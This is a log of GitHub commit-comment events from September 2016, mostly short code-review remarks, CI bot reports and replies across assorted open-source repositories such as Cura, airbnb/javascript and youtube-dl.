{"id":"4556315142","type":"CommitCommentEvent","actor":{"login":"stevejberry"},"repo":{"name":"Slind14/Wiki"},"payload":{"comment":{"id":19003437,"position":85,"line":116,"path":"docs/source/Launcher/index.rst","commit_id":"f98848b49f1a16d87d277839a74ae4c2a7cab5ed","created_at":"2016-09-13T15:23:17Z","updated_at":"2016-09-13T15:23:17Z","body":"again permissions are home user ~ no need to sudo this or set \"owner\" not permissions by the way. \r\n\r\nchmod is permissions, chown is who owns what. \r\n"}},"created_at":"2016-09-13T15:23:17Z"}
{"id":"4556315751","type":"CommitCommentEvent","actor":{"login":"FerMulas"},"repo":{"name":"jmartinezbernet/App"},"payload":{"comment":{"id":19003439,"position":7,"line":24,"path":"app/AppKernel.php","commit_id":"4d67c210ebe5a2ce5408037c650a582acaee5b33","created_at":"2016-09-13T15:23:22Z","updated_at":"2016-09-13T15:23:22Z","body":"Backslash before FOS"}},"created_at":"2016-09-13T15:23:22Z"}
{"id":"4556316236","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19003441,"position":8,"line":89,"path":"plugins/CuraEngineBackend/StartSliceJob.py","commit_id":"677d6556fbde47971fb7b4da8112b7d4d1f0312b","created_at":"2016-09-13T15:23:25Z","updated_at":"2016-09-13T15:23:25Z","body":"Good point. That's a far better resolvement. I'll fix it right away."}},"created_at":"2016-09-13T15:23:25Z"}
{"id":"4556316457","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19003442,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-13T15:23:27Z","updated_at":"2016-09-13T15:23:27Z","body":"If you agree I can rework that 😉"}},"created_at":"2016-09-13T15:23:27Z"}
{"id":"4556318622","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003448,"position":6,"line":6,"path":"src/actions.js","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:23:45Z","updated_at":"2016-09-13T15:23:45Z","body":"It's more conventional to put these exports in a file called `types.js`, and then to just import that file. Also, with individual exports you have to do:\r\n\r\n    import * as types from './types';\r\n\r\nWhereas if you export an object, like so:\r\n\r\n    export default {\r\n      UPDATE_SEARCH_TERM: 'UDPATE_SEARCH_TERM,\r\n      ...\r\n    }\r\n\r\nThen you can simply do:\r\n\r\n    import types from './types';"}},"created_at":"2016-09-13T15:23:45Z"}
{"id":"4556323924","type":"CommitCommentEvent","actor":{"login":"dhshah"},"repo":{"name":"dhshah/DataViz"},"payload":{"comment":{"id":19003459,"position":null,"line":null,"path":null,"commit_id":"8427682d82148667c5fc1689117749cd252d5633","created_at":"2016-09-13T15:24:33Z","updated_at":"2016-09-13T15:24:33Z","body":"This change\r\n- moved the CSS to external file\r\n- Made node name visible in a node on a graph"}},"created_at":"2016-09-13T15:24:33Z"}
{"id":"4556324808","type":"CommitCommentEvent","actor":{"login":"danielballan"},"repo":{"name":"danielballan/nbexamples"},"payload":{"comment":{"id":19003462,"position":null,"line":null,"path":null,"commit_id":"e7ae7e6bc4d5011155a4bb961b861bd2447bcdb2","created_at":"2016-09-13T15:24:41Z","updated_at":"2016-09-13T15:24:41Z","body":"Oops. Pushed now."}},"created_at":"2016-09-13T15:24:41Z"}
{"id":"4556325428","type":"CommitCommentEvent","actor":{"login":"vberthiaume"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19003466,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-13T15:24:46Z","updated_at":"2016-09-13T15:24:46Z","body":"Oh yeah, I would love if you could send that binary!\n\nOn Tue, Sep 13, 2016 at 11:09 AM, Maigre <notifications@github.com> wrote:\n\n> I was checking the fork history to see if some fix was developed by others\n> :)\n>\n> Yeah that issue with ALSA..\n> i encountered the same problem when trying to apply EQ on the audio output.\n>\n> I end up building a variant version of the HPlayer based on LibVLC instead\n> of omxplayer for that specific project. It works actually pretty fine, but\n> the libvlc compilation is really painfull so i did not take the time to\n> release the code, but it is planned (for a long time now..)\n>\n> LibVLC is quite interesting since it supports more format and encoding,\n> allows hw decoding (the painfull recompilation comes from that), output\n> audio thru ALSA, allow multiple instance...\n> but it doesn't support OpenGL manipulation yet, so it would be a feature\n> lost in HPlayer.\n>\n> I can send you the binary version of the player if you are interested in.\n> It can not be commanded by OSC but using standard input instead.\n> To allow OSC command you could use a little python (with pyliblo) script\n> to act as OSC listener and write to the player stdin.\n>\n> Best Regards,\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vberthiaume/HPlayer/commit/7c92cda10413b951794d95208d420c4379698785#commitcomment-19003188>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADjIMdAJVWJNKPw2z38Hzyl9EXLjAnfDks5qpry0gaJpZM4J7ww8>\n> .\n>\n"}},"created_at":"2016-09-13T15:24:46Z"}
{"id":"4556326572","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/javascript"},"payload":{"comment":{"id":19003469,"position":null,"line":null,"path":null,"commit_id":"6a72781121b2fd6709649d6d14b6a47ef0ad6042","created_at":"2016-09-13T15:24:55Z","updated_at":"2016-09-13T15:24:55Z","body":"eslint does not yet support those, and we don't use them yet because they require regenerator."}},"created_at":"2016-09-13T15:24:55Z"}
{"id":"4556326972","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003471,"position":5,"line":7,"path":"src/omdb.js","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:25:00Z","updated_at":"2016-09-13T15:25:00Z","body":"    json.Search || {}"}},"created_at":"2016-09-13T15:25:00Z"}
{"id":"4556328651","type":"CommitCommentEvent","actor":{"login":"nekonyanneko"},"repo":{"name":"nekonyanneko/DQN_Study"},"payload":{"comment":{"id":19003475,"position":null,"line":null,"path":null,"commit_id":"a5b47ad047ce85990e5b89c03e15c18159d2e0b2","created_at":"2016-09-13T15:25:15Z","updated_at":"2016-09-13T15:25:15Z","body":"機械学習概要byPRML"}},"created_at":"2016-09-13T15:25:15Z"}
{"id":"4556331426","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003482,"position":15,"line":15,"path":"src/sagas.js","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:25:38Z","updated_at":"2016-09-13T15:25:38Z","body":"You can use `takeEvery` instead of putting `take` in a `while(true)` loop."}},"created_at":"2016-09-13T15:25:38Z"}
{"id":"4556333141","type":"CommitCommentEvent","actor":{"login":"sjnewbury"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19003489,"position":null,"line":null,"path":null,"commit_id":"562c1e996c7e75978d1d189b13513e939f514a79","created_at":"2016-09-13T15:25:53Z","updated_at":"2016-09-13T15:25:53Z","body":"video_state_python.c also needs:\r\n\r\n+#include \"../configuration.h\"\r\n"}},"created_at":"2016-09-13T15:25:53Z"}
{"id":"4556334775","type":"CommitCommentEvent","actor":{"login":"cob16"},"repo":{"name":"Arie/serveme"},"payload":{"comment":{"id":19003495,"position":5,"line":16,"path":"script/logdaemon","commit_id":"b4f0bd62f318f5fbdc8eb4884a6e8595383eea0a","created_at":"2016-09-13T15:26:10Z","updated_at":"2016-09-13T15:26:10Z","body":"is rate still a command?"}},"created_at":"2016-09-13T15:26:10Z"}
{"id":"4556335431","type":"CommitCommentEvent","actor":{"login":"kevinjon27"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":19003498,"position":7,"line":25,"path":"src/http/Response/MediaCommentsResponse.php","commit_id":"22046b830b6e5d392c0fff8ca644c9b2a7d32c61","created_at":"2016-09-13T15:26:16Z","updated_at":"2016-09-13T15:26:16Z","body":"I think you should delete this line sir.hehe"}},"created_at":"2016-09-13T15:26:16Z"}
{"id":"4556336308","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003501,"position":20,"line":20,"path":"src/sagas.js","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:26:24Z","updated_at":"2016-09-13T15:26:24Z","body":"Typically I prefer to put actions that are returned from the action creator, like:\r\n\r\n    import { selectMovie } from './actions';\r\n\r\n    yield put(selectMovie(movie));"}},"created_at":"2016-09-13T15:26:24Z"}
{"id":"4556337819","type":"CommitCommentEvent","actor":{"login":"Aweary"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":19003507,"position":5,"line":387,"path":"test/ReactWrapper-spec.jsx","commit_id":"cf467a0ef9644dfe8767db75de47b4edffe8dcbb","created_at":"2016-09-13T15:26:37Z","updated_at":"2016-09-13T15:26:37Z","body":"That was undone in https://github.com/airbnb/enzyme/pull/487/commits/607928f87b98e55662793b58bfac4fc885c08f96"}},"created_at":"2016-09-13T15:26:37Z"}
{"id":"4556340880","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003514,"position":26,"line":26,"path":"src/sagas.js","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:27:05Z","updated_at":"2016-09-13T15:27:05Z","body":"You should never directly use the string value for types, instead you should use the constant:\r\n\r\n    const action = yield take(types.GET_MOVIE);"}},"created_at":"2016-09-13T15:27:05Z"}
{"id":"4556344059","type":"CommitCommentEvent","actor":{"login":"vinyll"},"repo":{"name":"BaseAdresseNationale/ban-monitoring"},"payload":{"comment":{"id":19003519,"position":6,"line":53,"path":"README.md","commit_id":"1d7761802ab1165e219aaf27c9423f374305e55d","created_at":"2016-09-13T15:27:33Z","updated_at":"2016-09-13T15:27:33Z","body":"yours."}},"created_at":"2016-09-13T15:27:33Z"}
{"id":"4556346891","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003526,"position":3,"line":3,"path":"src/sagas.js","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:27:57Z","updated_at":"2016-09-13T15:27:57Z","body":"It's also weird that you're exporting types from actions like this because now your action creators are available in your `types` variable."}},"created_at":"2016-09-13T15:27:57Z"}
{"id":"4556347837","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.relationfield"},"payload":{"comment":{"id":19003531,"position":null,"line":null,"path":null,"commit_id":"d0005ed431a39268b453de4caad2bb7220cfb1f7","created_at":"2016-09-13T15:28:07Z","updated_at":"2016-09-13T15:28:07Z","body":"@calvinhp Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.relationfield/9/violations\n```\nplone/app/relationfield/adapter.py:0:1: I001 isort found changes, run it on the file\nplone/app/relationfield/event.py:9:1: C901 'extract_relations' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-13T15:28:07Z"}
{"id":"4556350824","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19003541,"position":null,"line":null,"path":null,"commit_id":"dae2a3a7fec0df526060f325075c9d965fabcfd1","created_at":"2016-09-13T15:28:33Z","updated_at":"2016-09-13T15:28:33Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T15:28:33Z"}
{"id":"4556354339","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003552,"position":120,"line":70,"path":"ui/app.jsx","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:29:05Z","updated_at":"2016-09-13T15:29:05Z","body":"It's convention to attach propTypes in the constructor:\r\n\r\n    class App extends React.Component {\r\n      static propTypes = {\r\n        searchTerm: React.PropTypes.string,\r\n        ...\r\n      }\r\n    }"}},"created_at":"2016-09-13T15:29:05Z"}
{"id":"4556356876","type":"CommitCommentEvent","actor":{"login":"7c6f434c"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19003559,"position":null,"line":null,"path":null,"commit_id":"d1bf595cc57be0cafecfd12f2ce4e35cbc1211bd","created_at":"2016-09-13T15:29:28Z","updated_at":"2016-09-13T15:29:28Z","body":">Why didn't you merge the older and more complete https://github.com/NixOS/nixpkgs/pull/18450 ?\n\nDidn't notice it, sorry.\n\nAdded your changes.\n\n\n\n"}},"created_at":"2016-09-13T15:29:28Z"}
{"id":"4556361478","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19003571,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T15:30:10Z","updated_at":"2016-09-13T15:30:10Z","body":"Although this branch is very old and developers have change the focus, I support the idea to isolate the problem and test the rest as minor damage."}},"created_at":"2016-09-13T15:30:10Z"}
{"id":"4556361833","type":"CommitCommentEvent","actor":{"login":"abyot"},"repo":{"name":"dhis2/dhis2-core"},"payload":{"comment":{"id":19003573,"position":393,"line":398,"path":"dhis-2/dhis-web/dhis-web-commons-resources/src/main/webapp/dhis-web-commons/javascripts/dhis2/dhis2.angular.controllers.js","commit_id":"367bdb26fdc99486dda151f5b999c235f9b56268","created_at":"2016-09-13T15:30:15Z","updated_at":"2016-09-13T15:30:15Z","body":":)  thanks, fixed."}},"created_at":"2016-09-13T15:30:15Z"}
{"id":"4556362923","type":"CommitCommentEvent","actor":{"login":"sverbois"},"repo":{"name":"plomino/Plomino"},"payload":{"comment":{"id":19003577,"position":null,"line":null,"path":null,"commit_id":"2f8f247baeaec27b423e0bc8c8f2ebfbdf70661f","created_at":"2016-09-13T15:30:25Z","updated_at":"2016-09-13T15:30:25Z","body":"Typo : forlder --> folder"}},"created_at":"2016-09-13T15:30:25Z"}
{"id":"4556364976","type":"CommitCommentEvent","actor":{"login":"sacsri"},"repo":{"name":"sacsri/Sachin1"},"payload":{"comment":{"id":19003584,"position":null,"line":null,"path":null,"commit_id":"31e249bd1c7d83a2585cca601e44e80d2215e684","created_at":"2016-09-13T15:30:42Z","updated_at":"2016-09-13T15:30:42Z","body":"add a method which pull out all customer information"}},"created_at":"2016-09-13T15:30:42Z"}
{"id":"4556365886","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003586,"position":14,"line":13,"path":"ui/index.js","commit_id":"b7435637f46b4b8148edc6b9237a37a00856f3f3","created_at":"2016-09-13T15:30:49Z","updated_at":"2016-09-13T15:30:49Z","body":"tabs? maybe this was copy/paste"}},"created_at":"2016-09-13T15:30:49Z"}
{"id":"4556370313","type":"CommitCommentEvent","actor":{"login":"neerajaffimintus"},"repo":{"name":"neerajaffimintus/new-hello"},"payload":{"comment":{"id":19003597,"position":null,"line":null,"path":null,"commit_id":"6ad51bfd26f65c9fd7a4bfe7d9016c745854ae49","created_at":"2016-09-13T15:31:30Z","updated_at":"2016-09-13T15:31:30Z","body":"Hii It is changed file."}},"created_at":"2016-09-13T15:31:30Z"}
{"id":"4556373352","type":"CommitCommentEvent","actor":{"login":"neerajaffimintus"},"repo":{"name":"neerajaffimintus/new-hello"},"payload":{"comment":{"id":19003603,"position":null,"line":null,"path":null,"commit_id":"6ad51bfd26f65c9fd7a4bfe7d9016c745854ae49","created_at":"2016-09-13T15:31:56Z","updated_at":"2016-09-13T15:31:56Z","body":"These is for testing pupose."}},"created_at":"2016-09-13T15:31:56Z"}
{"id":"4556373371","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.relationfield"},"payload":{"comment":{"id":19003602,"position":null,"line":null,"path":null,"commit_id":"d05f3cded65308a32920b408ddea82366fb538cd","created_at":"2016-09-13T15:31:56Z","updated_at":"2016-09-13T15:31:56Z","body":"@calvinhp Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.relationfield/10/violations\n```\nplone/app/relationfield/adapter.py:0:1: I001 isort found changes, run it on the file\nplone/app/relationfield/event.py:9:1: C901 'extract_relations' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-13T15:31:56Z"}
{"id":"4556373960","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003605,"position":6,"line":28,"path":"package.json","commit_id":"249b059781b2c26fe42ede5f6f916e9cafc12595","created_at":"2016-09-13T15:32:01Z","updated_at":"2016-09-13T15:32:01Z","body":"You're missing redux, redux-saga, and react-redux."}},"created_at":"2016-09-13T15:32:01Z"}
{"id":"4556374498","type":"CommitCommentEvent","actor":{"login":"bs-thomas"},"repo":{"name":"bs-thomas/framework"},"payload":{"comment":{"id":19003607,"position":null,"line":null,"path":null,"commit_id":"7df679bc9ae0e37b4a57ba195cd0f015b2952c1f","created_at":"2016-09-13T15:32:07Z","updated_at":"2016-09-13T15:32:07Z","body":"You're right, the get request part is supposed to be handled by Symfony.  Symfony has another method that does the correct thing, called `getRealMethod()`.\r\n\r\nPlease refer to the commit #15140\r\nThis should be the correct one.\r\n\r\nThanks Graham!"}},"created_at":"2016-09-13T15:32:07Z"}
{"id":"4556376044","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19003614,"position":21,"line":55,"path":"youtube_dl/extractor/adobepass.py","commit_id":"6150502e4709b6b2ebc226c9c38fa346b9358699","created_at":"2016-09-13T15:32:21Z","updated_at":"2016-09-13T15:32:21Z","body":"Doesn't it make sense to null `authz_token` also in this case?"}},"created_at":"2016-09-13T15:32:21Z"}
{"id":"4556379286","type":"CommitCommentEvent","actor":{"login":"sosacdiego"},"repo":{"name":"sosacdiego/math221"},"payload":{"comment":{"id":19003623,"position":null,"line":null,"path":null,"commit_id":"ab53cb71a784ecce32973c54129c7b6fb7e4b7c5","created_at":"2016-09-13T15:32:49Z","updated_at":"2016-09-13T15:32:49Z","body":"Actually Exercise 4"}},"created_at":"2016-09-13T15:32:49Z"}
{"id":"4556382355","type":"CommitCommentEvent","actor":{"login":"osuvaldo90"},"repo":{"name":"towerviewhealth/securitypolicies"},"payload":{"comment":{"id":19003629,"position":19,"line":13,"path":"source/sections/introduction.md","commit_id":"19d7945f6aa12a59d22926eedbac7cebd48a2b51","created_at":"2016-09-13T15:33:19Z","updated_at":"2016-09-13T15:33:19Z","body":"I'd change \"Logstash logging servers, and Linux Ubuntu monitoring servers.\" to just \"and Linux monitoring servers.\""}},"created_at":"2016-09-13T15:33:19Z"}
{"id":"4556383174","type":"CommitCommentEvent","actor":{"login":"loris"},"repo":{"name":"airbnb/javascript"},"payload":{"comment":{"id":19003631,"position":null,"line":null,"path":null,"commit_id":"6a72781121b2fd6709649d6d14b6a47ef0ad6042","created_at":"2016-09-13T15:33:25Z","updated_at":"2016-09-13T15:33:25Z","body":"Fair enough, but since `eslint-config-airbnb` is being used by others, who might use `async/await` functions, what is your recommendation? Disabling the rule for the time being?"}},"created_at":"2016-09-13T15:33:25Z"}
{"id":"4556387337","type":"CommitCommentEvent","actor":{"login":"osuvaldo90"},"repo":{"name":"towerviewhealth/securitypolicies"},"payload":{"comment":{"id":19003644,"position":22,"line":15,"path":"source/sections/introduction.md","commit_id":"19d7945f6aa12a59d22926eedbac7cebd48a2b51","created_at":"2016-09-13T15:34:05Z","updated_at":"2016-09-13T15:34:05Z","body":"\"... that patient data *may be* collected...\" - missing the \"be\""}},"created_at":"2016-09-13T15:34:05Z"}
{"id":"4556389709","type":"CommitCommentEvent","actor":{"login":"abangcik"},"repo":{"name":"abangcik/tasks"},"payload":{"comment":{"id":19003649,"position":5,"line":1,"path":"iskandar.md","commit_id":"1354a19d1b2ac6e03195269542d6766d44a31d9c","created_at":"2016-09-13T15:34:27Z","updated_at":"2016-09-13T15:34:27Z","body":"bla"}},"created_at":"2016-09-13T15:34:27Z"}
{"id":"4556394098","type":"CommitCommentEvent","actor":{"login":"denniscdmc"},"repo":{"name":"dmcouncil/ember-bootstrap-time-input-group"},"payload":{"comment":{"id":19003665,"position":null,"line":null,"path":null,"commit_id":"fa431eeb8d6f2ccc0b81a1375b290980aadf850c","created_at":"2016-09-13T15:35:08Z","updated_at":"2016-09-13T15:35:08Z","body":"Yup, it is at https://emberobserver.com/addons/ember-bootstrap-time-input-group, or https://www.npmjs.com/package/ember-bootstrap-time-input-group. Although some setup may be incorrect since it doesn't seem to be linked to this repo.\r\n"}},"created_at":"2016-09-13T15:35:08Z"}
{"id":"4556394521","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19003666,"position":33,"line":131,"path":"youtube_dl/extractor/adobepass.py","commit_id":"7e60ce9cf7b104c15fcc4c495166dc57b950b987","created_at":"2016-09-13T15:35:12Z","updated_at":"2016-09-13T15:35:12Z","body":"Will this trigger when remote side revokes some token for some reason? Does it trigger when you change authn and/or authz in local cache (for test)?"}},"created_at":"2016-09-13T15:35:12Z"}
{"id":"4556395580","type":"CommitCommentEvent","actor":{"login":"abellotti"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19003674,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-13T15:35:22Z","updated_at":"2016-09-13T15:35:22Z","body":"why this change ?  or do you just need to rebase ?"}},"created_at":"2016-09-13T15:35:22Z"}
{"id":"4556397698","type":"CommitCommentEvent","actor":{"login":"ebrehault"},"repo":{"name":"plomino/Plomino"},"payload":{"comment":{"id":19003686,"position":null,"line":null,"path":null,"commit_id":"2f8f247baeaec27b423e0bc8c8f2ebfbdf70661f","created_at":"2016-09-13T15:35:40Z","updated_at":"2016-09-13T15:35:40Z","body":"thanks\r\nfixed"}},"created_at":"2016-09-13T15:35:40Z"}
{"id":"4556398678","type":"CommitCommentEvent","actor":{"login":"denniscdmc"},"repo":{"name":"dmcouncil/ember-bootstrap-time-input-group"},"payload":{"comment":{"id":19003689,"position":null,"line":null,"path":null,"commit_id":"db14d6a9d411bd5c7b38e87c8be5bea39e77c5d6","created_at":"2016-09-13T15:35:48Z","updated_at":"2016-09-13T15:35:48Z","body":"Yeah for Rubymine... it's harmless."}},"created_at":"2016-09-13T15:35:48Z"}
{"id":"4556399526","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19003692,"position":4,"line":6,"path":"src/sagas.js","commit_id":"249b059781b2c26fe42ede5f6f916e9cafc12595","created_at":"2016-09-13T15:35:57Z","updated_at":"2016-09-13T15:35:57Z","body":"If your component had a \"No results\" state, setting results to `[]` here would mistakenly render that state. Instead, you could set `results` to `null` here so that you handle 3 separate states:\r\n\r\n    null // loading\r\n    [] // no results\r\n    [{}, ...] // results"}},"created_at":"2016-09-13T15:35:57Z"}
{"id":"4556402491","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/javascript"},"payload":{"comment":{"id":19003702,"position":null,"line":null,"path":null,"commit_id":"6a72781121b2fd6709649d6d14b6a47ef0ad6042","created_at":"2016-09-13T15:36:25Z","updated_at":"2016-09-13T15:36:25Z","body":"What parser are you using?\r\n\r\nI'd say you should do two things:\r\n - file an issue on eslint, so they're sure to fix the issue when they update to support async functions\r\n - disable the rule for now in the same place you override the default parser."}},"created_at":"2016-09-13T15:36:25Z"}
{"id":"4556406158","type":"CommitCommentEvent","actor":{"login":"loris"},"repo":{"name":"airbnb/javascript"},"payload":{"comment":{"id":19003710,"position":null,"line":null,"path":null,"commit_id":"6a72781121b2fd6709649d6d14b6a47ef0ad6042","created_at":"2016-09-13T15:36:55Z","updated_at":"2016-09-13T15:36:55Z","body":"`babel-eslint`, ok will do! thanks!"}},"created_at":"2016-09-13T15:36:55Z"}
{"id":"4556406660","type":"CommitCommentEvent","actor":{"login":"sirmax123"},"repo":{"name":"tcpcloud/salt-formula-sensu"},"payload":{"comment":{"id":19003711,"position":217,"line":217,"path":"sensu/files/plugins/handlers/notification/sfdc.py","commit_id":"cca98e987c3b28e874237a077f849f605a4974c0","created_at":"2016-09-13T15:37:01Z","updated_at":"2016-09-13T15:37:01Z","body":"Why do u use print instead of LOG ?"}},"created_at":"2016-09-13T15:37:01Z"}
{"id":"4556414193","type":"CommitCommentEvent","actor":{"login":"DuarteNGF"},"repo":{"name":"DuarteNGF/ExampleCucumberMaven"},"payload":{"comment":{"id":19003724,"position":4,"line":27,"path":"MavenCucumberPrototype/pom.xml","commit_id":"7ad79f9b44f813809d954697385e5011dcfe5547","created_at":"2016-09-13T15:38:11Z","updated_at":"2016-09-13T15:38:11Z","body":"atualização"}},"created_at":"2016-09-13T15:38:11Z"}
{"id":"4556418326","type":"CommitCommentEvent","actor":{"login":"etanshaul"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":19003734,"position":null,"line":null,"path":null,"commit_id":"3cee690a355cf3b9b32ee37579647bafc42061b1","created_at":"2016-09-13T15:38:48Z","updated_at":"2016-09-13T15:38:48Z","body":"Lgtm"}},"created_at":"2016-09-13T15:38:48Z"}
{"id":"4556420289","type":"CommitCommentEvent","actor":{"login":"reduz"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19003737,"position":null,"line":null,"path":null,"commit_id":"f10d2bd3944f3a520cf9f131b801f403c834ea6e","created_at":"2016-09-13T15:39:07Z","updated_at":"2016-09-13T15:39:07Z","body":"one hides the docks, the other goes fullscreen, it shouldn't be the same\n\nOn Tue, Sep 13, 2016 at 11:38 AM, Ignacio Etcheverry <\nnotifications@github.com> wrote:\n\n> What's the point of this distraction mode now? Wouldn't it be the same as\n> fullscreen mode? IMO it was fine :(\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/godotengine/godot/commit/f10d2bd3944f3a520cf9f131b801f403c834ea6e#commitcomment-19002581>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AF-Z2yjPI4KZoi7Y7o7H4aSAbF9bq-iBks5qprVVgaJpZM4J7v0J>\n> .\n>\n"}},"created_at":"2016-09-13T15:39:07Z"}
{"id":"4556427477","type":"CommitCommentEvent","actor":{"login":"nant1086"},"repo":{"name":"nant1086/Compare-Net-Objects"},"payload":{"comment":{"id":19003756,"position":null,"line":null,"path":null,"commit_id":"9f4ca223185e622272f3de6cc5142c418da926b0","created_at":"2016-09-13T15:40:08Z","updated_at":"2016-09-13T15:40:08Z","body":"It needs to upgrade to .net framework 4.0 and add System.ComponentModel.DataAnnotations reference"}},"created_at":"2016-09-13T15:40:08Z"}
{"id":"4556430817","type":"CommitCommentEvent","actor":{"login":"ChalkPE"},"repo":{"name":"marzn/telegrambot-japi"},"payload":{"comment":{"id":19003762,"position":null,"line":null,"path":null,"commit_id":"96642d27eb3f4e44a09c0d2ba664003bf3bec9dc","created_at":"2016-09-13T15:40:38Z","updated_at":"2016-09-13T15:40:38Z","body":":+1:"}},"created_at":"2016-09-13T15:40:38Z"}
{"id":"4556438141","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"sev-/scummvm-peterkohaut"},"payload":{"comment":{"id":19003789,"position":null,"line":null,"path":null,"commit_id":"7e5e9e64c1f2ff3e01a22694f99831b9e5ab2590","created_at":"2016-09-13T15:41:44Z","updated_at":"2016-09-13T15:41:44Z","body":"Here are some warnings for you:\r\n\r\nhttp://pastebin.com/1dMRmTsY\r\n\r\nAlso, there is a compilation error, with INT_MAX undefined:\r\n\r\n```\r\ndiff --git a/engines/bladerunner/audio_player.cpp b/engines/bladerunner/audio_player.cpp\r\nindex 1698bfb..dc6f195 100644\r\n--- a/engines/bladerunner/audio_player.cpp\r\n+++ b/engines/bladerunner/audio_player.cpp\r\n@@ -166,7 +166,7 @@ void AudioPlayer::fadeAndStopTrack(Track *track, int time)\r\n int AudioPlayer::playAud(const Common::String &name, int volume, int panFrom, int panTo, int priority, byte flags) {\r\n        /* Find first available track or, alternatively, the lowest priority playing track */\r\n        Track *track = NULL;\r\n-       int    lowestPriority = INT_MAX;\r\n+       int    lowestPriority = 1000000;\r\n        Track *lowestPriorityTrack = NULL;\r\n \r\n        for (int i = 0; i != 6; ++i) {\r\n```"}},"created_at":"2016-09-13T15:41:44Z"}
